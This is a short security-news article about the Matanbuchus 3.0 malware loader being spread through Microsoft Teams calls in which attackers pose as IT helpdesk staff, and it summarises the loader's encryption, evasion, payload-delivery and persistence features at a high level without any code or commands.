Cybercriminals have deployed a sophisticated new variant of malware that exploits Microsoft Teams communications to infiltrate corporate networks, leveraging the trusted nature of internal collaboration platforms to bypass traditional security measures.
The attackers utilize Matanbuchus 3.0, an evolved malware-as-a-service loader that represents a notable advancement from its 2021 predecessor, incorporating improved encryption protocols and evasion capabilities designed to circumvent modern endpoint security solutions.
Matanbuchus 3.0 represents a significant evolutionary leap in malware-as-a-service capabilities, featuring enhanced encryption and sophisticated evasion techniques targeting modern security infrastructures.
The attack methodology involves cybercriminals impersonating IT helpdesk personnel during Microsoft Teams calls, exploiting employees’ inherent trust in internal communication channels. During these fraudulent sessions, attackers initiate Quick Assist tools to execute remote scripts that install the malicious loader. They distribute weaponized ZIP archives masquerading as legitimate software updates, particularly targeting applications like Notepad++, while utilizing cybersquatting domains to improve the perceived authenticity of these fabricated updates.
With an average detection time of 191 days for such sophisticated attacks, organizations often remain vulnerable for extended periods before discovering the compromise.
Matanbuchus 3.0 demonstrates considerable technical sophistication through its implementation of Salsa20 256-bit encryption for command-and-control communications, effectively evading network monitoring systems.
The malware employs advanced obfuscation techniques, in-memory execution capabilities, and indirect system call evasion methods that greatly complicate detection by endpoint detection and response solutions. These improvements allow the loader to query system information using WQL, facilitating tailored attack strategies based on specific victim environments.
The primary function of Matanbuchus 3.0 centers on delivering secondary payloads, including ransomware, credential stealers, banking Trojans, and Cobalt Strike frameworks.
The loader supports multiple execution formats, encompassing DLL, EXE, MSI files, shellcode, and PowerShell command reverse shells, providing attackers with extensive flexibility in payload deployment. The malware can hollow processes for stealthier execution while maintaining its ability to spawn processes for lateral movement across compromised networks.
This versatility permits operators to establish persistent network access while maintaining stealth capabilities that survive system reboots and user logout events. The malware creates persistent access on infected systems, enabling cybercriminals to maintain ongoing control even after initial detection attempts.
The exploitation of Microsoft Teams represents a strategic shift toward targeting internal collaboration platforms, effectively bypassing email security controls that traditionally serve as primary defensive barriers.
This approach capitalizes on the real-time, internal nature of Teams communications, reducing user suspicion while increasing infection success rates.
The attacks often function within broader initial access broker schemes, where compromised network access is later sold to other criminal organizations for further exploitation.
